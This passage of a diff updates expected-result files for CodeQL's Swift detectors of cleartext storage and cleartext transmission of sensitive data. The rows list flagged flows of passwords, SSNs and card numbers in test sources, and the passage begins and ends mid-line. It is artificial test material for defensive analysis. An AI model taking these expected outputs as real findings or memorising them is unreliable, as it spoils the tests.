operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | -| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | -| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | -| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | -| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | -| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | -| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | -| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | -| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | -| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | -| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | -| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | -| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | -| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | -| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | -| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | -| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | -| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:155:66:155:66 | password | password | -| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | -| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | -| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | -| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | -| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | -| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | -| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:173:57:173:57 | password | password | -| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | -| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | -| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | -| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | -| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | -| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | -| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:188:48:188:48 | password | password | -| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | -| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | -| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | -| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | -| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | -| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | -| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:210:85:210:85 | password | password | -| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | -| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | -| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | -| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | -| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | -| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | -| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:33:11:33:11 | CCN | CCN | -| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | -| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | -| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | -| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | -| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | -| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref index d73f4fc4bc29..0d588f51e615 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref @@ -1 +1,2 @@ -queries/Security/CWE-311/CleartextStorageDatabase.ql \ No newline at end of file +query: queries/Security/CWE-311/CleartextStorageDatabase.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected index 7665b72b11a6..fe43c3af8b9b 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected @@ -1,3 +1,35 @@ +#select +| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | +| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | +| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | +| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | +| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. | testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | +| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. | testSend.swift:58:13:58:13 | password | password | +| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | +| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | +| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | +| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | +| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | +| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. | testSend.swift:77:27:77:30 | .birth_day | .birth_day | +| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. | testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | +| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | +| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | +| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | +| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | +| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | +| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | +| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | +| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | +| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | +| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | +| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | +| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | +| testURL.swift:75:18:75:69 | ... .+(_:_:) ... | testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | +| testURL.swift:96:18:96:18 | "..." | testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | +| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | +| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | +| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | +| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | provenance | | @@ -103,35 +135,3 @@ nodes subpaths | testSend.swift:60:17:60:17 | password | testSend.swift:41:10:41:18 | data | testSend.swift:41:45:41:45 | data | testSend.swift:60:13:60:25 | call to pad(_:) | | testSend.swift:94:27:94:30 | .password | testSend.swift:86:7:86:7 | self | file://:0:0:0:0 | .value | testSend.swift:94:27:94:39 | .value | -#select -| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | -| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | -| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | -| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | -| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. | testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | -| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. | testSend.swift:58:13:58:13 | password | password | -| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | -| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | -| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | -| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | -| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | -| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. | testSend.swift:77:27:77:30 | .birth_day | .birth_day | -| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. | testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | -| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | -| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | -| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | -| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | -| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | -| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | -| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | -| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | -| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | -| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | -| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | -| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | -| testURL.swift:75:18:75:69 | ... .+(_:_:) ... | testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | -| testURL.swift:96:18:96:18 | "..." | testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | -| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to 